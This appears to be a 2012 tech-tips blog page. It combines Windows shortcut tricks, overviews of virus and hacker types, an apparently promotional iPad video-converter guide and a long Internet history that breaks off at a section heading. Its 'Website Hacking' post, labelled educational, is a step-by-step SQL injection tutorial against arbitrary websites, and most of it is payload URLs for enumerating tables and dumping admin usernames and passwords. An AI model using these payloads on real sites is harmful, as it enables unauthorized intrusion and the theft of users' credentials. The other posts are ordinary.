GEO NEWS

Tuesday 31 January 2012

How to Shut Down Your PC with a Timer

Do you know that you can make your PC shut down at a time you choose?
Here is the trick!
How To Make A Shutdown Timer!
********** METHOD 1 ***************
1.    Right-click on your desktop and choose New => Shortcut.
2.    In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click Next. Note: 3600 is the number of seconds before your computer shuts down, i.e. 60 secs * 60 mins = 3600 secs.
3.    Make up a name for the shortcut and you're done.
You can change the icon by right-clicking => Properties => Change Icon => Browse.

TO ABORT:
To make an abort shortcut that stops the shutdown timer, just create another shortcut and set
the "location of the shortcut" to "shutdown -a" without the quotes.
********* METHOD 2 *************
Here is another trick to shut down at a specific time. For example, if you wish to shut down at 11:35 am, type this in:

Start => Run
Type the code: at 11:35 shutdown -s

TO ABORT:
Code: shutdown -a
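The at command can also schedule the shutdown to repeat. A quick sketch (the time and the weekday list are only example values): to shut the PC down at 11:00 pm every weekday, you could type
at 23:00 /every:M,T,W,Th,F "shutdown -s"
and at /delete removes the scheduled jobs again.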

Make a Photo Background in Drives


Perform the following steps:

Open Notepad and copy the following code:

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=D:\Wallpapers\celeb\Genelia.jpg
iconarea_text=0x00FFFFFF


Here, the path in the second line of the code is the path of your picture, so change only that line to point to your own image.
Now save this file as DESKTOP.INI in the location (any drive or any folder) where you want to set the background picture.
After saving it in your chosen location, close the drive and open the location again.
DONE! Your picture has been set as the background picture for the chosen location.
 

NOTE: Make sure the image in the path has the .jpg extension and that the file is saved exactly as DESKTOP.INI.
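One optional extra step, assuming for the sake of example that the file was saved in the root of the D: drive: you can hide DESKTOP.INI so it does not clutter the folder, using the standard attrib command from Start => Run => cmd:
attrib +s +h D:\desktop.ini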

Virus Types



What is a computer virus? A potentially damaging computer program capable of reproducing itself and causing great harm to files or other programs without the permission or knowledge of the user.
Virus - A program that, when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects, ranging from wiping your hard drive, to displaying a joke in a small box, to doing nothing at all except replicating themselves. These types of infections tend to be localized to your computer and do not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.
Types of viruses:
The different types of viruses are as follows:
1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for booting the operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses an infected floppy disk in the floppy drive, i.e. once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot-sector viruses are Michelangelo and Stoned.
2) File or Program Viruses :- Some files/programs, when executed, load the virus into memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS.

Some common file viruses are Sunday and Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms and remains recursively infective in each target. It attempts to attack both the boot sector and the executable or program files at the same time. When the virus attaches to the boot sector, it will in turn affect the system's files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature, meaning they use various methods to hide themselves and avoid detection. They sometimes remove themselves from memory temporarily to avoid detection by antivirus software, which makes them somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.
5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate, meaning that they change the viral code, known as the signature, each time they spread or infect. Thus an antivirus program that scans for specific virus code is unable to detect their presence.
6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless. A macro virus is often spread as an e-mail virus. Well-known examples are the Concept virus and the Melissa worm.

If you use a computer, read the newspaper, or watch the news, you will know about computer viruses and other malware. These are the malicious programs that, once they infect your machine, start causing havoc on your computer. What many people do not know is that there are many different types of infections that fall under the general category of malware.

Malware - Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain types of adware.

This article will focus on the malware that are considered viruses, trojans, and worms, though this information can be used to remove the other types of malware as well. We will not go into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed and those won't be covered in this tutorial.
Before we continue it is important to understand the generic malware terms that you will be reading about.

Backdoor- A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.

Hijackers - A program that attempts to hijack certain Internet functions, such as redirecting your start page to the hijacker's own start page, redirecting search queries to an undesired search engine, or replacing search results from popular search engines with its own information.
Spyware - A program that monitors your activity or information on your computer and sends that information to a remote computer without your knowledge.

Adware- A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware.
There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.

Dialler - A program that typically dials a premium-rate number that has per-minute charges over and above the typical call charge. These calls are usually made with the intent of gaining access to pornographic material.

Trojan- A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.

Worm- A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.

Types of Hackers



There are three types of hackers:
 
1.    White hat hacker
2.    Gray hat hacker
3.    Black hat hacker


White Hat and Grey Hat Hackers: What Is the Real Difference?
 
What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think, especially if we consider that these are very intelligent people.

So, what is white hat (ethical) hacking, and how does it differ from grey hat hacking? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.

 


What Is A White Hat Hacker?
 
A hacker can be a whiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for himself, or even worse, dominate the world.
In the movie The Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent machines, so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware or software. Hackers made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a particular code into a telephone in order to make free international calls.

When computers appeared, these people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world; instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hat hacker, also known as a cracker: someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution to make some money.


On the other side is the white hat hacker. Although white hat hacking can be considered similar to black hat hacking, there is an important difference: a white hat hacker does it with no criminal intention in mind. Companies around the world that want to test their systems contract white hat hackers. They will test how secure their systems are and point out any faults they may find. If you want to become a white hat hacker, Linux, a PC and an internet connection are all you need.




Grey Hat Hackers:

A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gain. Grey hat hackers use their skills in
order to prove to themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hat hackers.

For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime. 

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hat hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, meet at DEF CON. These conventions are well attended; the last one drew 6,600 people.
Every year, DEF CON is held in Las Vegas, Nevada. However, hackers are not the only ones who go to this event. There are also computer journalists, computer security professionals, lawyers, and employees of the federal government.

The event is composed of tracks of different kinds, all of them related, in some way, to the world of hackers (computer security, worms, viruses, new technologies, coding, etc). Besides the tracks, there are contests that involve hacking computers, lock picking and even robot-related events.

Ethical hacking, white hat hacking or whatever name you wish to use has, in the end, one purpose: to protect the systems of organizations, public or private, around the world. After all, hackers can now be located anywhere, and they can be counted by the millions. Soon, concepts like white hat, the Linux operating system or grey hat will become common knowledge; real proof of how much our society has been influenced by technology.



Black Hat Hackers:

Black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals. 


Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hat hacker (or cracker) does. So, let's learn about black hat techniques and how they make our lives a little more difficult.

Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. 

The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.
 
What Is Black Hat Hacking?
 
A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the Force), is someone who uses his skills with criminal intent. Some examples are: cracking bank accounts in order to make transfers to their own accounts, stealing information to be sold on the black market, or attacking the computer network of an organization for money.

Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, the mastermind behind the theft of $10,000,000 from Citibank.

Website Hacking


     Learn How To Hack Websites With Different Techniques..    
(EDUCATIONAL PURPOSE ONLY)


SQL Injection in MySQL Databases:-


SQL Injection attacks are code injections that exploit the database layer of the application. This most commonly means MySQL databases, but there are techniques to carry out this attack against other databases such as Oracle. In this tutorial I will be showing you the steps to carry out the attack on a MySQL database.

Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = followed by a number or a string, but most commonly a number. Once you have found a page like this, test for vulnerability by simply entering a ' after the number in the URL. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal, then the database is not vulnerable and the website is not open to this kind of SQL injection.

Step 2


Now we need to find the number of columns returned by the vulnerable query. We do this using the "order by" command, entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive a MySQL error on "order by 5", that means we have 4 columns. If the site errored on "order by 9", we would have 8 columns. If this does not work, instead of -- after the number, change it to /*; they are two different comment styles, and if one works the other tends not to. It just depends on the way the database is configured as to which one is used.

Step 3


We are now going to use the "union" command to find the vulnerable columns. After the URL we enter union all select followed by the column numbers and --,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put union all select 1,2,3,4,5,6,7--. If this is done successfully, the page should show a couple of numbers somewhere on the page, for example 2 and 3. This means columns 2 and 3 are vulnerable.


Step 4


We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or, if these don't work, try:
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and the MySQL version, for example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 or above, read on to carry out the attack. If it is 4 or below, you have to brute-force or guess the table and column names; programs can be used to do this.
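As a side note, here is a sketch of a variation on the same hypothetical 4-column example: the user, database name and version can be pulled through a single vulnerable column with MySQL's concat_ws() function, using 0x3a (a colon) as the separator:
www.site.com/page=1 union all select 1,concat_ws(0x3a,user(),database(),version()),3,4--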

Step 5


In this step our aim is to list all the table names in the database. To do this we enter the following command after the URL:
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this step we want to list all the column names in the database. To do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user, email and password.

Step 7


Finally we need to dump the data. Say we want to get the "username" and "password" fields from the table "admin"; we would use the following command:
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Install Windows XP in 10 Minutes



>> Hey guys, this time it's an extreme trick that you might not believe, but it's true and we have done it. This time I will explain how to install Windows XP in just 10 minutes. << Read on and enjoy!

As we all know, when formatting a computer, after the file copying is completed Windows says it requires about 39 more minutes. But what's extreme about that? Well, we can bypass this waiting time. How to do it? Read on.
I have included snapshots that will help you.

>> INSTALLING WIN XP IN 10 MINUTES! <<
STEP 1: After the copy part is over, the system is rebooted, as we all know from the general formatting procedure.
After the reboot, the screen below will appear.




STEP 2: As soon as this screen appears, press "Shift + F10". This will open the Command Prompt. Now type taskmgr in it. This will open the Task Manager.

STEP 3: After the Task Manager opens, go to Processes, find the "setup.exe" process, right-click on it and set its priority to the highest setting.



 
STEP 4: Now just watch the setup. It will take around 9 minutes, plus about 2 minutes of tolerance (it depends from system to system).

That's the overall tutorial. Hope you all have liked it.

So when you format your PC next time, it will really save your time, i.e. around 20 to 25 minutes. Enjoy!

                                                       

Monday 30 January 2012

How to Convert DVD and Video to Your Fashionable iPad




The iPad has only been out for about a month, but it is already pretty popular. I think you guys who got an iPad are very proud of it. How do you make full use of its great storage space without spending extra money, and show it off to friends? The best choice is to use the DVD collection and videos you already have. But how do you go about it?
Recently I found some information on the internet that I feel is useful for everyone, so I'd like to share it with you guys. There is third-party software that can rip DVDs and convert video for the iPad, and the whole process is easy. The programs are Aiseesoft DVD to iPad Converter and Aiseesoft iPad Video Converter.

The rest of this post is divided into two parts to describe the process in detail.
Part One: How to Rip a DVD to iPad.
First you need to download the software, Aiseesoft DVD to iPad Converter, then install and run DVD to iPad Converter.
The specific steps are as follows:



Step 1: Load DVD.
Click "Load DVD" to add your DVD contents.
Step 2: Set output video format.
Click "Profile" button from the drop-down list to select the exact output video format that is the most suitable for your iPad. You can click the "Settings" button to set parameters of your output video such as such as Resolution, Video Bitrate, Frame Rate, Audio Channels, Sample Rate, etc. to get the best video quality as you want.
Step 3: Select the output path by clicking “Browse” button from the line of destination.
Step 4: Click the "Start" button to start the conversion.

Part Two: How to Convert Video to iPad.

It works the same way. First download the software, Aiseesoft iPad Video Converter, then install and run iPad Video Converter.

The specific steps are as follows:



Step 1: Add video.
Click "Add Video" to add your video contents.
Step 2: Set output video format.
Click "Profile" button from the drop-down list to select the exact output video format that is the most suitable for your iPad. You can click the "Settings" button to set parameters of your output video such as such as Resolution, Video Bitrate, Frame Rate, Audio Channels, Sample Rate, etc. to get the best video quality as you want.
Step 3: Select the output path by clicking “Browse” button from the line of destination.
Step 4: Click the "Start" button to start the conversion.

Tips:
The two pieces of software also have some basic editing functions such as trim, crop and effect adjustments.
1. Trim:
Three ways to trim:
a. Drag the "start scissors bar" button to where you want the clip to start and the "end scissors bar" button to where you want it to end.
b. Click the "Trim From" button during your preview when you want the trim to start, and click the "Trim To" button when you want it to end.
c. Set the exact "start time" and "end time" in the right part of the trim window and click "OK".


2. Crop:
Three ways to crop:
a. Select one crop mode from the "Crop Mode" drop-down list.
b. Drag the crop frame to choose your own crop area.
c. Set your own crop values.


3. Effect
Drag the adjustment bar to find your favorite effect of Brightness, Contrast, Saturation and Volume.


4. Merge into one file.
Check the "Merge into one file" option to merge the files you choose into one output file.

There is another piece of software named iPad Converter Suite. It includes DVD to iPad Converter, iPad Video Converter and iPad Transfer.

Type With an Onscreen Keyboard


Whether you have trouble with your hands or you just prefer using the mouse, typing with Windows' onscreen keyboard can be a great convenience. Navigate to Start > All Programs > Accessories > Accessibility, and click "On-Screen Keyboard." Click OK to clear the dialogue box and then start "typing"—you can even change the settings to "press" keys just by hovering your mouse over the letter you want (enable this feature by selecting "Typing Mode" from the Settings menu).
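A quicker route, assuming a standard Windows XP installation (worth double-checking on your machine), is to open the same keyboard from the Run box: go to Start > Run, type osk and press Enter.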

Shut Down from Your Desktop

If you're trying to eliminate every extraneous mouse click, you can shut down your computer with an icon on the desktop. Right-click on your desktop, click "New," and then click "Shortcut." In the "Type the location of the item" field, type "shutdown -s -t 00" to give you a way to shut down the computer immediately. (Change the -s to -r to create a reboot shortcut instead.)
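For reference, a sketch of the shortcut targets this trick uses (the log-off line is an extra assumption, not part of the original tip):
shutdown -s -t 00  (shut down immediately)
shutdown -r -t 00  (restart immediately)
shutdown -l  (log off the current user)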

Saturday 21 January 2012

History of the Internet

The history of the Internet began with the development of computers in the 1950s. This began with point-to-point communication between mainframe computers and terminals, expanded to point-to-point connections between computers and then early research into packet switching. Packet switched networks such as ARPANET, Mark I at NPL in the UK, CYCLADES, Merit Network, Tymnet, and Telenet, were developed in the late 1960s and early 1970s using a variety of protocols. The ARPANET in particular led to the development of protocols for internetworking, where multiple separate networks could be joined together into a network of networks.

In 1982 the Internet Protocol Suite (TCP/IP) was standardized and the concept of a world-wide network of fully interconnected TCP/IP networks called the Internet was introduced. Access to the ARPANET was expanded in 1981 when the National Science Foundation (NSF) developed the Computer Science Network (CSNET) and again in 1986 when NSFNET provided access to supercomputer sites in the United States from research and education organizations. Commercial internet service providers (ISPs) began to emerge in the late 1980s and 1990s. The ARPANET was decommissioned in 1990. The Internet was commercialized in 1995 when NSFNET was decommissioned, removing the last restrictions on the use of the Internet to carry commercial traffic.

Since the mid-1990s the Internet has had a drastic impact on culture and commerce, including the rise of near-instant communication by electronic mail, instant messaging, Voice over Internet Protocol (VoIP) "phone calls", two-way interactive video calls, and the World Wide Web with its discussion forums, blogs, social networking, and online shopping sites. The research and education community continues to develop and use advanced networks such as NSF's very high speed Backbone Network Service (vBNS), Internet2, and National LambdaRail. Increasing amounts of data are transmitted at higher and higher speeds over fiber optic networks operating at 1-Gbit/s, 10-Gbit/s, or more. The Internet continues to grow, driven by ever greater amounts of online information and knowledge, commerce, entertainment and social networking.
It is estimated that in 1993 the Internet carried only 1% of the information flowing through two-way telecommunication. By 2000 this figure had grown to 51%, and by 2007 more than 97% of all telecommunicated information was carried over the Internet.[1]
Internet history timeline
Early research and development:
  • 1961 First packet-switching papers
  • 1966 Merit Network founded
  • 1966 ARPANET planning starts
  • 1969 ARPANET carries its first packets
  • 1970 Mark I network at NPL (UK)
  • 1970 Network Information Center (NIC)
  • 1971 Merit Network's packet-switched network operational
  • 1971 Tymnet packet-switched network
  • 1972 Internet Assigned Numbers Authority (IANA) established
  • 1973 CYCLADES network demonstrated
  • 1974 Telenet packet-switched network
  • 1976 X.25 protocol approved
  • 1979 Internet Activities Board (IAB)
  • 1980 USENET news using UUCP
  • 1980 Ethernet standard introduced
  • 1981 BITNET established
Merging the networks and creating the Internet:
  • 1981 Computer Science Network (CSNET)
  • 1982 TCP/IP protocol suite formalized
  • 1982 Simple Mail Transfer Protocol (SMTP)
  • 1983 Domain Name System (DNS)
  • 1983 MILNET split off from ARPANET
  • 1986 NSFNET with 56 kbit/s links
  • 1986 Internet Engineering Task Force (IETF)
  • 1987 UUNET founded
  • 1988 NSFNET upgraded to 1.5 Mbit/s (T1)
  • 1988 OSI Reference Model released
  • 1988 Morris worm
  • 1989 Border Gateway Protocol (BGP)
  • 1989 PSINet founded, allows commercial traffic
  • 1989 Federal Internet Exchanges (FIXes)
  • 1990 GOSIP (without TCP/IP)
  • 1990 ARPANET decommissioned
  • 1990 Advanced Network and Services (ANS)
  • 1990 UUNET/Alternet allows commercial traffic
  • 1990 Archie search engine
  • 1991 Wide area information server (WAIS)
  • 1991 Gopher
  • 1991 Commercial Internet eXchange (CIX)
  • 1991 ANS CO+RE allows commercial traffic
  • 1991 World Wide Web (WWW)
  • 1992 NSFNET upgraded to 45 Mbit/s (T3)
  • 1992 Internet Society (ISOC) established
  • 1993 Classless Inter-Domain Routing (CIDR)
  • 1993 InterNIC established
  • 1993 Mosaic web browser released
  • 1994 Full text web search engines
  • 1994 North American Network Operators' Group (NANOG) established
Commercialization, privatization, broader access leads to the modern Internet:
  • 1995 New Internet architecture with commercial ISPs connected at NAPs
  • 1995 NSFNET decommissioned
  • 1995 GOSIP updated to allow TCP/IP
  • 1995 very high-speed Backbone Network Service (vBNS)
  • 1995 IPv6 proposed
  • 1998 Internet Corporation for Assigned Names and Numbers (ICANN)
  • 1999 IEEE 802.11b wireless networking
  • 1999 Internet2/Abilene Network
  • 1999 vBNS+ allows broader access
  • 2000 Dot-com bubble bursts
  • 2001 Code Red I, Code Red II, and Nimda worms
  • 2003 National LambdaRail founded
Examples of popular Internet services:
  • 1990 IMDb Internet movie database
  • 1995 Amazon.com online retailer
  • 1995 eBay online auction and shopping
  • 1995 Craigslist classified advertisements
  • 1996 Hotmail free web-based e-mail
  • 1997 Babel Fish automatic translation
  • 1998 Google Search
  • 1999 Napster peer-to-peer file sharing
  • 2001 Wikipedia, the free encyclopedia
  • 2003 LinkedIn business networking
  • 2003 Myspace social networking site
  • 2003 Skype Internet voice calls
  • 2003 iTunes Store
  • 2004 Facebook social networking site
  • 2004 Podcast media file series
  • 2004 Flickr image hosting
  • 2005 YouTube video sharing
  • 2005 Google Earth virtual globe
  • 2006 Twitter microblogging
  • 2007 Google Street View
  • 2009 Bing search engine


Precursors

The Internet has precursors that date back to the 19th century, especially the telegraph system, more than a century before the digital Internet became widely used in the second half of the 1990s. The concept of data communication – transmitting data between two different places, connected via some kind of electromagnetic medium, such as radio or an electrical wire – predates the introduction of the first computers. Such communication systems were typically limited to point to point communication between two end devices. Telegraph systems and telex machines can be considered early precursors of this kind of communication.

Early computers used the technology available at the time to allow communication between the central processing unit and remote terminals. As the technology evolved, new systems were devised to allow communication over longer distances (for terminals) or with higher speed (for interconnection of local devices) that were necessary for the mainframe computer model. Using these technologies it was possible to exchange data (such as files) between remote computers. However, the point to point communication model was limited, as it did not allow for direct communication between any two arbitrary systems; a physical link was necessary. The technology was also deemed as inherently unsafe for strategic and military use, because there were no alternative paths for the communication in case of an enemy attack.

Three terminals and an ARPA

A fundamental pioneer in the call for a global network, J. C. R. Licklider, articulated the ideas in his January 1960 paper, Man-Computer Symbiosis.
"A network of such [computers], connected to one another by wide-band communication lines [which provided] the functions of present-day libraries together with anticipated advances in information storage and retrieval and [other] symbiotic functions."
—J.C.R. Licklider, [2]
In August 1962, Licklider and Welden Clark published the paper "On-Line Man Computer Communication", one of the first descriptions of a networked future.
In October 1962, Licklider was hired by Jack Ruina as Director of the newly established Information Processing Techniques Office (IPTO) within DARPA, with a mandate to interconnect the United States Department of Defense's main computers at Cheyenne Mountain, the Pentagon, and SAC HQ. There he formed an informal group within DARPA to further computer research. He began by writing memos describing a distributed network to the IPTO staff, whom he called "Members and Affiliates of the Intergalactic Computer Network". As part of the information processing office's role, three network terminals had been installed: one for System Development Corporation in Santa Monica, one for Project Genie at the University of California, Berkeley and one for the Compatible Time-Sharing System project at the Massachusetts Institute of Technology (MIT). Licklider's identified need for inter-networking would be made obvious by the apparent waste of resources this caused.
"For each of these three terminals, I had three different sets of user commands. So if I was talking online with someone at S.D.C. and I wanted to talk to someone I knew at Berkeley or M.I.T. about this, I had to get up from the S.D.C. terminal, go over and log into the other terminal and get in touch with them. [...] I said, it's obvious what to do (But I don't want to do it): If you have these three terminals, there ought to be one terminal that goes anywhere you want to go where you have interactive computing. That idea is the ARPAnet."
Robert W. Taylor, co-writer with Licklider of "The Computer as a Communications Device", in an interview with The New York Times[3]
Although he left the IPTO in 1964, five years before the ARPANET went live, it was his vision of universal networking that provided the impetus that led his successors such as Lawrence Roberts and Robert Taylor to further the ARPANET development. Licklider later returned to lead the IPTO in 1973 for two years.[4]

Packet switching

At the tip of the problem lay the issue of connecting separate physical networks to form one logical network. During the 1960s, Paul Baran (RAND Corporation), produced a study of survivable networks for the US military. Information transmitted across Baran's network would be divided into what he called 'message-blocks'. Independently, Donald Davies (National Physical Laboratory, UK), proposed and developed a similar network based on what he called packet-switching, the term that would ultimately be adopted. Leonard Kleinrock (MIT) developed mathematical theory behind this technology. Packet-switching provides better bandwidth utilization and response times than the traditional circuit-switching technology used for telephony, particularly on resource-limited interconnection links.[5]
Packet switching is a rapid store-and-forward networking design that divides messages up into arbitrary packets, with routing decisions made per-packet. Early networks used message switched systems that required rigid routing structures prone to a single point of failure. This led Paul Baran's U.S. military funded research to focus on using message-blocks to include network redundancy,[6] which in turn led to the widespread urban legend that the Internet was designed to resist nuclear attack.[7][8]

Networks that led to the Internet

ARPANET

Promoted to the head of the information processing office at DARPA, Robert Taylor intended to realize Licklider's ideas of an interconnected networking system. Bringing in Larry Roberts from MIT, he initiated a project to build such a network. The first ARPANET link was established between the University of California, Los Angeles and the Stanford Research Institute at 22:30 hours on October 29, 1969.
"We set up a telephone connection between us and the guys at SRI ...", Kleinrock ... said in an interview: "We typed the L and we asked on the phone,
"Do you see the L?"
"Yes, we see the L," came the response.
We typed the O, and we asked, "Do you see the O."
"Yes, we see the O."
Then we typed the G, and the system crashed ...
Yet a revolution had begun" ....[10]
By December 5, 1969, a 4-node network was connected by adding the University of Utah and the University of California, Santa Barbara. Building on ideas developed in ALOHAnet, the ARPANET grew rapidly. By 1981, the number of hosts had grown to 213, with a new host being added approximately every twenty days.[11][12]
ARPANET became the technical core of what would become the Internet, and a primary tool in developing the technologies used. ARPANET development was centered around the Request for Comments (RFC) process, still used today for proposing and distributing Internet Protocols and Systems. RFC 1, entitled "Host Software", was written by Steve Crocker from the University of California, Los Angeles, and published on April 7, 1969. These early years were documented in the 1972 film Computer Networks: The Heralds of Resource Sharing.
International collaborations on ARPANET were sparse. For various political reasons, European developers were concerned with developing the X.25 networks. Notable exceptions were the Norwegian Seismic Array (NORSAR) in 1972, followed in 1973 by Sweden with satellite links to the Tanum Earth Station and Peter Kirstein's research group in the UK, initially at the Institute of Computer Science, London University and later at University College London.[13]

NPL

In 1965, Donald Davies of the National Physical Laboratory (United Kingdom) proposed a national data network based on packet-switching. The proposal was not taken up nationally, but by 1970 he had designed and built the Mark I packet-switched network to meet the needs of the multidisciplinary laboratory and prove the technology under operational conditions.[14] By 1976 12 computers and 75 terminal devices were attached and more were added until the network was replaced in 1986.

Merit Network

The Merit Network[15] was formed in 1966 as the Michigan Educational Research Information Triad to explore computer networking between three of Michigan's public universities as a means to help the state's educational and economic development.[16] With initial support from the State of Michigan and the National Science Foundation (NSF), the packet-switched network was first demonstrated in December 1971 when an interactive host to host connection was made between the IBM mainframe computer systems at the University of Michigan in Ann Arbor and Wayne State University in Detroit.[17] In October 1972 connections to the CDC mainframe at Michigan State University in East Lansing completed the triad. Over the next several years, in addition to host to host interactive connections, the network was enhanced to support terminal to host connections, host to host batch connections (remote job submission, remote printing, batch file transfer), interactive file transfer, gateways to the Tymnet and Telenet public data networks, X.25 host attachments, gateways to X.25 data networks, Ethernet attached hosts, and eventually TCP/IP; additional public universities in Michigan also joined the network.[17][18] All of this set the stage for Merit's role in the NSFNET project starting in the mid-1980s.

CYCLADES

The CYCLADES packet switching network was a French research network designed and directed by Louis Pouzin. First demonstrated in 1973, it was developed to explore alternatives to the initial ARPANET design and to support network research generally. It was the first network to make the hosts responsible for the reliable delivery of data, rather than the network itself, using unreliable datagrams and associated end-to-end protocol mechanisms.[19][20]

X.25 and public data networks

Based on ARPA's research, packet switching network standards were developed by the International Telecommunication Union (ITU) in the form of X.25 and related standards. While using packet switching, X.25 is built on the concept of virtual circuits emulating traditional telephone connections. In 1974, X.25 formed the basis for the SERCnet network between British academic and research sites, which later became JANET. The initial ITU Standard on X.25 was approved in March 1976.[21]
The British Post Office, Western Union International and Tymnet collaborated to create the first international packet switched network, referred to as the International Packet Switched Service (IPSS), in 1978. This network grew from Europe and the US to cover Canada, Hong Kong and Australia by 1981. By the 1990s it provided a worldwide networking infrastructure.[22]
Unlike ARPANET, X.25 was commonly available for business use. Telenet offered its Telemail electronic mail service, which was also targeted to enterprise use rather than the general email system of the ARPANET.
The first public dial-in networks used asynchronous TTY terminal protocols to reach a concentrator operated in the public network. Some networks, such as CompuServe, used X.25 to multiplex the terminal sessions into their packet-switched backbones, while others, such as Tymnet, used proprietary protocols. In 1979, CompuServe became the first service to offer electronic mail capabilities and technical support to personal computer users. The company broke new ground again in 1980 as the first to offer real-time chat with its CB Simulator. Other major dial-in networks were America Online (AOL) and Prodigy that also provided communications, content, and entertainment features. Many bulletin board system (BBS) networks also provided on-line access, such as FidoNet which was popular amongst hobbyist computer users, many of them hackers and amateur radio operators.

UUCP and Usenet

